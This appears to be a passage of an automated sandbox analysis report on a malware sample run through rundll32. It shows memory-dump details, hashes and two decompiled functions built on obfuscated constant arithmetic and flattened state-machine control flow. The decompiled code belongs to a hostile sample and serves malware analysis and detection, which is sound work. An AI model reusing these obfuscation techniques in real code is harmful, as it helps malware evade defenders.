                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d684
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d684
                                                                                                                                                            0x0037d581
                                                                                                                                                            0x0037d5b9
                                                                                                                                                            0x0037d5c8
                                                                                                                                                            0x0037d5d1
                                                                                                                                                            0x0037d5ee
                                                                                                                                                            0x0037d5f3
                                                                                                                                                            0x0037d60e
                                                                                                                                                            0x0037d613
                                                                                                                                                            0x0037d616
                                                                                                                                                            0x0037d619
                                                                                                                                                            0x0037d61d
                                                                                                                                                            0x0037d630
                                                                                                                                                            0x0037d63f
                                                                                                                                                            0x0037d646
                                                                                                                                                            0x0037d64b
                                                                                                                                                            0x0037d64f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d61f
                                                                                                                                                            0x0037d61f
                                                                                                                                                            0x0037d626
                                                                                                                                                            0x0037d628
                                                                                                                                                            0x0037d628
                                                                                                                                                            0x0037d62b
                                                                                                                                                            0x0037d62c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d61f
                                                                                                                                                            0x0037d589
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d5a1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d6c7
                                                                                                                                                            0x0037d6c7
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                                                            • API String ID: 0-3591755710
                                                                                                                                                            • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                                            • Instruction ID: 48377582796e00c06f44843ca0cb8da6dde0267441b1308fabe044ed11b842e4
                                                                                                                                                            • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                                            • Instruction Fuzzy Hash: 16121F715083808FD369CF25C48AA5BBBF1FFC4348F50891DF69A8A261DBB5A944CF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038907F Relevance: 7.8, Strings: 6, Instructions: 261COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E0038907F(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* _t284;
				void* _t285;
				intOrPtr _t286;
				void* _t293;
				void* _t301;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				void* _t311;
				intOrPtr* _t343;
				void* _t347;
				signed int* _t348;

				_t348 =  &_v132;
				_t343 = __ecx;
				_v4 = __ecx;
				_v40 = 0x7c806d;
				_v40 = _v40 + 0x9e80;
				_v40 = _v40 ^ 0x007d1eed;
				_v12 = 0xea5ac0;
				_v12 = _v12 + 0xffff451e;
				_v12 = _v12 ^ 0x00e99fde;
				_v24 = 0xace3a9;
				_t347 = 0;
				_t304 = 0xa;
				_v24 = _v24 / _t304;
				_v24 = _v24 ^ 0x001149f7;
				_t301 = 0x97dfe60;
				_v112 = 0x63471f;
				_v112 = _v112 ^ 0x706c6b64;
				_v112 = _v112 | 0x0d4cecae;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0xea7f67f8;
				_v28 = 0x68a2fc;
				_t305 = 0x5b;
				_v28 = _v28 * 0x1c;
				_v28 = _v28 ^ 0x0b71d390;
				_v84 = 0x508d02;
				_v84 = _v84 | 0x7bfb7ba7;
				_v84 = _v84 ^ 0x7bffa5e3;
				_v124 = 0xc0d8a4;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 ^ 0xdba96bec;
				_v124 = _v124 + 0xffffcd63;
				_v124 = _v124 ^ 0xdb66cc39;
				_v116 = 0xc7a01f;
				_v116 = _v116 * 0x50;
				_v116 = _v116 << 7;
				_v116 = _v116 + 0x525d;
				_v116 = _v116 ^ 0x3100192e;
				_v88 = 0x173e76;
				_v88 = _v88 / _t305;
				_v88 = _v88 + 0xcdb8;
				_v88 = _v88 ^ 0x00098d3b;
				_v48 = 0x3a45de;
				_t306 = 0x3d;
				_v48 = _v48 / _t306;
				_v48 = _v48 ^ 0x0006d702;
				_v52 = 0xd8d0f7;
				_v52 = _v52 | 0xabcf1793;
				_v52 = _v52 + 0xffff6a1e;
				_v52 = _v52 ^ 0xabd8e28c;
				_v64 = 0xff5420;
				_v64 = _v64 >> 9;
				_v64 = _v64 + 0xffff2626;
				_v64 = _v64 ^ 0xfff0768b;
				_v80 = 0x65116e;
				_v80 = _v80 >> 9;
				_v80 = _v80 | 0xde6750c8;
				_v80 = _v80 ^ 0xde6208e1;
				_v56 = 0x2d6903;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 + 0xffff4c70;
				_v56 = _v56 ^ 0xfff58c10;
				_v132 = 0xe5be5a;
				_v132 = _v132 + 0xfffffbec;
				_v132 = _v132 << 3;
				_v132 = _v132 ^ 0x46ad3c03;
				_v132 = _v132 ^ 0x418237eb;
				_v108 = 0x3fa801;
				_v108 = _v108 + 0x902;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x9ac0b97a;
				_v108 = _v108 ^ 0x9ac73a04;
				_v72 = 0x454e35;
				_v72 = _v72 + 0x4c9c;
				_t307 = 0x29;
				_v72 = _v72 / _t307;
				_v72 = _v72 ^ 0x000328df;
				_v32 = 0x46b9f;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0003d4b9;
				_v16 = 0xab007f;
				_v16 = _v16 ^ 0x56a4e801;
				_v16 = _v16 ^ 0x56002f48;
				_v100 = 0xb9d48c;
				_v100 = _v100 | 0xb434f54e;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x000dcd0e;
				_v92 = 0x17070b;
				_t308 = 0x37;
				_v92 = _v92 / _t308;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x0038b56c;
				_v60 = 0xdb418a;
				_v60 = _v60 * 0x4d;
				_v60 = _v60 << 2;
				_v60 = _v60 ^ 0x07c52fa3;
				_v68 = 0x99d1b0;
				_v68 = _v68 << 1;
				_v68 = _v68 + 0xadc1;
				_v68 = _v68 ^ 0x01384a96;
				_v120 = 0xfb4a64;
				_v120 = _v120 | 0x92bfeeef;
				_v120 = _v120 + 0x1827;
				_v120 = _v120 >> 5;
				_v120 = _v120 ^ 0x0494323d;
				_v128 = 0xf75f57;
				_v128 = _v128 >> 4;
				_v128 = _v128 + 0xe158;
				_v128 = _v128 + 0xffff16ce;
				_v128 = _v128 ^ 0x000f9950;
				_v76 = 0xb94cf;
				_v76 = _v76 | 0xc911a6ab;
				_v76 = _v76 >> 2;
				_v76 = _v76 ^ 0x3240c46f;
				_v104 = 0x7ca07;
				_v104 = _v104 * 0x23;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0xe4d42587;
				_v104 = _v104 ^ 0xe4c14657;
				_v44 = 0x308a5a;
				_v44 = _v44 >> 0x10;
				_v44 = _v44 ^ 0x0006e55e;
				_v96 = 0x427aa5;
				_v96 = _v96 + 0xed3d;
				_v96 = _v96 + 0xffff13f4;
				_v96 = _v96 ^ 0x0046a078;
				_v20 = 0xf8f4;
				_v20 = _v20 * 0x4a;
				_t284 = 0x4469cd4;
				_v20 = _v20 ^ 0x004ab19f;
				_v36 = 0x7998ac;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x0008cf6c;
				do {
					while(_t301 != _t284) {
						if(_t301 == 0x661bd7c) {
							E0037957D(_v8, _v96, _v20, _v28, _v36);
						} else {
							if(_t301 == 0x8cd68b1) {
								_push(_v116);
								_push(_v124);
								_t293 = E0038DCF7(_v84, 0x371954, __eflags);
								_push(_v52);
								_push(_v48);
								__eflags = E00379462(_t293, _v80,  &_v8, E0038DCF7(_v88, 0x371814, __eflags), _v56, _v40) - _v12;
								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
								E0037A8B0(_v132, _t293, _v108);
								E0037A8B0(_v72, _t294, _v32);
								_t343 = _v4;
								L8:
								_t284 = 0x4469cd4;
								_t348 =  &(_t348[0xb]);
								goto L9;
							} else {
								if(_t301 != 0x97dfe60) {
									goto L9;
								} else {
									_t301 = 0x8cd68b1;
									continue;
								}
							}
						}
						L12:
						return _t347;
					}
					_push(_v92);
					_push(_v100);
					_t285 = E0038DCF7(_v16, 0x371854, __eflags);
					_pop(_t311);
					_t286 =  *0x393dfc; // 0x0
					__eflags = E0037AA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
					_t301 = 0x661bd7c;
					_t347 =  ==  ? 1 : _t347;
					E0037A8B0(_v104, _t285, _v44);
					goto L8;
					L9:
					__eflags = _t301 - 0x94c729c;
				} while (__eflags != 0);
				goto L12;
			}


















































                                                                                                                                                            0x0038907f
                                                                                                                                                            0x00389089
                                                                                                                                                            0x0038908b
                                                                                                                                                            0x00389092
                                                                                                                                                            0x0038909c
                                                                                                                                                            0x003890a4
                                                                                                                                                            0x003890ac
                                                                                                                                                            0x003890b7
                                                                                                                                                            0x003890c2
                                                                                                                                                            0x003890cd
                                                                                                                                                            0x003890db
                                                                                                                                                            0x003890dd
                                                                                                                                                            0x003890e2
                                                                                                                                                            0x003890eb
                                                                                                                                                            0x003890f6
                                                                                                                                                            0x003890fb
                                                                                                                                                            0x00389103
                                                                                                                                                            0x0038910b
                                                                                                                                                            0x00389113
                                                                                                                                                            0x00389118
                                                                                                                                                            0x00389120
                                                                                                                                                            0x0038912d
                                                                                                                                                            0x00389130
                                                                                                                                                            0x00389134
                                                                                                                                                            0x0038913c
                                                                                                                                                            0x00389144
                                                                                                                                                            0x0038914c
                                                                                                                                                            0x00389154
                                                                                                                                                            0x0038915c
                                                                                                                                                            0x00389164
                                                                                                                                                            0x0038916c
                                                                                                                                                            0x00389174
                                                                                                                                                            0x0038917c
                                                                                                                                                            0x00389189
                                                                                                                                                            0x0038918d
                                                                                                                                                            0x00389192
                                                                                                                                                            0x0038919a
                                                                                                                                                            0x003891a2
                                                                                                                                                            0x003891b2
                                                                                                                                                            0x003891b6
                                                                                                                                                            0x003891be
                                                                                                                                                            0x003891c6
                                                                                                                                                            0x003891d2
                                                                                                                                                            0x003891d5
                                                                                                                                                            0x003891d9
                                                                                                                                                            0x003891e1
                                                                                                                                                            0x003891e9
                                                                                                                                                            0x003891f1
                                                                                                                                                            0x003891f9
                                                                                                                                                            0x00389201
                                                                                                                                                            0x00389209
                                                                                                                                                            0x0038920e
                                                                                                                                                            0x00389216
                                                                                                                                                            0x0038921e
                                                                                                                                                            0x00389226
                                                                                                                                                            0x0038922b
                                                                                                                                                            0x00389233
                                                                                                                                                            0x0038923b
                                                                                                                                                            0x00389243
                                                                                                                                                            0x00389248
                                                                                                                                                            0x00389250
                                                                                                                                                            0x00389258
                                                                                                                                                            0x00389260
                                                                                                                                                            0x00389268
                                                                                                                                                            0x0038926d
                                                                                                                                                            0x00389277
                                                                                                                                                            0x0038927f
                                                                                                                                                            0x00389287
                                                                                                                                                            0x0038928f
                                                                                                                                                            0x00389294
                                                                                                                                                            0x0038929c
                                                                                                                                                            0x003892a4
                                                                                                                                                            0x003892ac
                                                                                                                                                            0x003892ba
                                                                                                                                                            0x003892bf
                                                                                                                                                            0x003892c5
                                                                                                                                                            0x003892cd
                                                                                                                                                            0x003892d5
                                                                                                                                                            0x003892da
                                                                                                                                                            0x003892e2
                                                                                                                                                            0x003892ed
                                                                                                                                                            0x003892f8
                                                                                                                                                            0x00389303
                                                                                                                                                            0x0038930b
                                                                                                                                                            0x00389313
                                                                                                                                                            0x00389318
                                                                                                                                                            0x00389320
                                                                                                                                                            0x0038932c
                                                                                                                                                            0x0038932f
                                                                                                                                                            0x00389333
                                                                                                                                                            0x00389338
                                                                                                                                                            0x00389340
                                                                                                                                                            0x0038934d
                                                                                                                                                            0x00389351
                                                                                                                                                            0x00389356
                                                                                                                                                            0x0038935e
                                                                                                                                                            0x00389366
                                                                                                                                                            0x0038936a
                                                                                                                                                            0x00389372
                                                                                                                                                            0x0038937a
                                                                                                                                                            0x00389382
                                                                                                                                                            0x0038938a
                                                                                                                                                            0x00389392
                                                                                                                                                            0x00389397
                                                                                                                                                            0x0038939f
                                                                                                                                                            0x003893a7
                                                                                                                                                            0x003893ac
                                                                                                                                                            0x003893b4
                                                                                                                                                            0x003893bc
                                                                                                                                                            0x003893c4
                                                                                                                                                            0x003893cc
                                                                                                                                                            0x003893d4
                                                                                                                                                            0x003893d9
                                                                                                                                                            0x003893e1
                                                                                                                                                            0x003893ee
                                                                                                                                                            0x003893f2
                                                                                                                                                            0x003893f7
                                                                                                                                                            0x003893ff
                                                                                                                                                            0x00389407
                                                                                                                                                            0x0038940f
                                                                                                                                                            0x00389414
                                                                                                                                                            0x0038941c
                                                                                                                                                            0x00389424
                                                                                                                                                            0x0038942c
                                                                                                                                                            0x00389434
                                                                                                                                                            0x0038943c
                                                                                                                                                            0x0038944f
                                                                                                                                                            0x00389456
                                                                                                                                                            0x0038945b
                                                                                                                                                            0x00389466
                                                                                                                                                            0x0038946e
                                                                                                                                                            0x00389473
                                                                                                                                                            0x0038947b
                                                                                                                                                            0x0038947b
                                                                                                                                                            0x00389489
                                                                                                                                                            0x003895e5
                                                                                                                                                            0x0038948f
                                                                                                                                                            0x00389495
                                                                                                                                                            0x003894aa
                                                                                                                                                            0x003894b3
                                                                                                                                                            0x003894bb
                                                                                                                                                            0x003894c0
                                                                                                                                                            0x003894cb
                                                                                                                                                            0x0038950e
                                                                                                                                                            0x00389519
                                                                                                                                                            0x0038951c
                                                                                                                                                            0x0038952e
                                                                                                                                                            0x00389533
                                                                                                                                                            0x003895b5
                                                                                                                                                            0x003895b5
                                                                                                                                                            0x003895ba
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389497
                                                                                                                                                            0x0038949d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003894a3
                                                                                                                                                            0x003894a3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003894a3
                                                                                                                                                            0x0038949d
                                                                                                                                                            0x00389495
                                                                                                                                                            0x003895ef
                                                                                                                                                            0x003895f9
                                                                                                                                                            0x003895f9
                                                                                                                                                            0x0038953c
                                                                                                                                                            0x00389545
                                                                                                                                                            0x00389550
                                                                                                                                                            0x00389556
                                                                                                                                                            0x00389564
                                                                                                                                                            0x003895a0
                                                                                                                                                            0x003895a2
                                                                                                                                                            0x003895ab
                                                                                                                                                            0x003895b0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003895bd
                                                                                                                                                            0x003895bd
                                                                                                                                                            0x003895bd
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                                                            • API String ID: 0-668800459
                                                                                                                                                            • Opcode ID: c200b803dd34a2f1e36dd06abe1fd0fa77e563cf63561a23bbe9ea325f9788f5
                                                                                                                                                            • Instruction ID: d467766b80640084339a6eab68fd18b96fc4f308fb73a5b1dadf33f5f74c5a2c
                                                                                                                                                            • Opcode Fuzzy Hash: c200b803dd34a2f1e36dd06abe1fd0fa77e563cf63561a23bbe9ea325f9788f5
                                                                                                                                                            • Instruction Fuzzy Hash: 3ED11FB11087809FD3A9CF25C48A61BBBF1FBC5758F50891DF1AA86260DBB58949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00390F33 Relevance: 7.8, Strings: 6, Instructions: 260COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00390F33() {
				signed int _t237;
				signed char _t246;
				signed short _t255;
				signed int _t262;
				signed char _t269;
				intOrPtr* _t292;
				signed short _t301;
				void* _t302;
				signed short _t306;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed short _t319;
				void* _t321;

				 *(_t321 + 0x20) = 0xee0abc;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
				_t262 = 0x40ff1a8;
				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
				 *(_t321 + 0x14) = 0x97563a;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
				_t309 = 0x68;
				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
				 *(_t321 + 0x54) = 0x46dfd;
				_t310 = 0x22;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
				 *(_t321 + 0x50) = 0x65d669;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
				 *(_t321 + 0x1c) = 0xa5dab8;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
				 *(_t321 + 0x58) = 0x508bac;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
				 *(_t321 + 0x38) = 0x6dc462;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
				 *(_t321 + 0x20) = 0x10f337;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
				_t311 = 0x7a;
				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
				 *(_t321 + 0x28) = 0x5a8e56;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
				 *(_t321 + 0x40) = 0x558325;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
				 *(_t321 + 0x3c) = 0x76576d;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
				 *(_t321 + 0x38) = 0x7fcfc;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
				 *(_t321 + 0x58) = 0x685aea;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
				 *(_t321 + 0x24) = 0x2cb25b;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
				 *(_t321 + 0x20) = 0x5c4f5f;
				_t312 = 0x75;
				_t306 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
				_t319 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
				 *(_t321 + 0x48) = 0x281dd4;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
				 *(_t321 + 0x60) = 0x5ec984;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
				 *(_t321 + 0x4c) = 0xbf15d9;
				_t313 = 0x6c;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
				_t314 = 0x6b;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
				 *(_t321 + 0x30) = 0x4468c3;
				_t315 = 0x7e;
				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
				while(1) {
					L1:
					_t292 =  *0x393e08; // 0x0
					while(1) {
						L2:
						_t237 =  *(_t321 + 0x60);
						L3:
						while(_t262 != 0x160fcc4) {
							if(_t262 == 0x26954f0) {
								 *_t237 = _t319;
								_t262 = 0xfeff895;
								 *_t292 =  *_t292 + 1;
								_t237 = _t319;
								 *(_t321 + 0x60) = _t237;
								continue;
							} else {
								if(_t262 == 0x40ff1a8) {
									_t179 = _t292 + 0x20; // 0x20
									_t237 = _t179;
									_t262 = 0x5ead19b;
									 *(_t321 + 0x60) = _t237;
									continue;
								} else {
									if(_t262 == 0x58e8483) {
										_push(_t262);
										_push(_t262);
										_t302 = 0x40;
										_t319 = E00377FF2(_t302);
										__eflags = _t319;
										if(__eflags == 0) {
											goto L20;
										} else {
											_t262 = 0x160fcc4;
											goto L1;
										}
									} else {
										if(_t262 == 0x5ead19b) {
											_t255 = E00387BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x393000);
											 *(_t321 + 0x70) = _t255;
											_t306 = _t255;
											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
											_t262 = 0x58e8483;
											while(1) {
												L1:
												_t292 =  *0x393e08; // 0x0
												goto L2;
											}
										} else {
											if(_t262 == 0xd41016e) {
												E00388519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
												L20:
												_t292 =  *0x393e08; // 0x0
											} else {
												if(_t262 != 0xfeff895) {
													L17:
													__eflags = _t262 - 0x20f61b3;
													if(__eflags != 0) {
														L2:
														_t237 =  *(_t321 + 0x60);
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
													continue;
												}
											}
										}
									}
								}
							}
							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
							__eflags = 1;
							return 1;
						}
						_push( *(_t321 + 0x1c));
						_push( *(_t321 + 0x38));
						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
						E00381652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E0038DCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x371590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
						E0037A8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
						_t321 = _t321 + 0x3c;
						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
						_t246 =  *((intOrPtr*)(_t306 + 6));
						_t269 =  *((intOrPtr*)(_t306 + 7));
						_t306 = _t306 + 8;
						_t262 = 0x26954f0;
						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
						__eflags = _t301;
						 *(_t319 + 0x18) = _t301;
						_t292 =  *0x393e08; // 0x0
						goto L17;
					}
				}
			}





















                                                                                                                                                            0x00390f36
                                                                                                                                                            0x00390f40
                                                                                                                                                            0x00390f48
                                                                                                                                                            0x00390f56
                                                                                                                                                            0x00390f5a
                                                                                                                                                            0x00390f62
                                                                                                                                                            0x00390f6a
                                                                                                                                                            0x00390f72
                                                                                                                                                            0x00390f80
                                                                                                                                                            0x00390f85
                                                                                                                                                            0x00390f8b
                                                                                                                                                            0x00390f93
                                                                                                                                                            0x00390fa0
                                                                                                                                                            0x00390fa3
                                                                                                                                                            0x00390fa7
                                                                                                                                                            0x00390faf
                                                                                                                                                            0x00390fb7
                                                                                                                                                            0x00390fbc
                                                                                                                                                            0x00390fc4
                                                                                                                                                            0x00390fd1
                                                                                                                                                            0x00390fd5
                                                                                                                                                            0x00390fda
                                                                                                                                                            0x00390fdf
                                                                                                                                                            0x00390fe7
                                                                                                                                                            0x00390fef
                                                                                                                                                            0x00390ff7
                                                                                                                                                            0x00390fff
                                                                                                                                                            0x0039100f
                                                                                                                                                            0x00391013
                                                                                                                                                            0x0039101b
                                                                                                                                                            0x00391023
                                                                                                                                                            0x0039102b
                                                                                                                                                            0x00391035
                                                                                                                                                            0x00391036
                                                                                                                                                            0x0039103a
                                                                                                                                                            0x0039103f
                                                                                                                                                            0x00391047
                                                                                                                                                            0x0039104f
                                                                                                                                                            0x0039105d
                                                                                                                                                            0x00391061
                                                                                                                                                            0x00391066
                                                                                                                                                            0x0039106e
                                                                                                                                                            0x00391076
                                                                                                                                                            0x0039107e
                                                                                                                                                            0x00391086
                                                                                                                                                            0x0039108e
                                                                                                                                                            0x00391096
                                                                                                                                                            0x0039109a
                                                                                                                                                            0x003910a2
                                                                                                                                                            0x003910aa
                                                                                                                                                            0x003910b2
                                                                                                                                                            0x003910bc
                                                                                                                                                            0x003910c0
                                                                                                                                                            0x003910c8
                                                                                                                                                            0x003910d0
                                                                                                                                                            0x003910d8
                                                                                                                                                            0x003910e0
                                                                                                                                                            0x003910e8
                                                                                                                                                            0x003910f0
                                                                                                                                                            0x003910f8
                                                                                                                                                            0x003910fd
                                                                                                                                                            0x00391107
                                                                                                                                                            0x00391116
                                                                                                                                                            0x00391119
                                                                                                                                                            0x0039111d
                                                                                                                                                            0x00391129
                                                                                                                                                            0x0039112d
                                                                                                                                                            0x00391131
                                                                                                                                                            0x00391139
                                                                                                                                                            0x00391141
                                                                                                                                                            0x00391149
                                                                                                                                                            0x0039114e
                                                                                                                                                            0x00391156
                                                                                                                                                            0x0039115e
                                                                                                                                                            0x00391166
                                                                                                                                                            0x0039116e
                                                                                                                                                            0x00391176
                                                                                                                                                            0x00391182
                                                                                                                                                            0x00391187
                                                                                                                                                            0x00391191
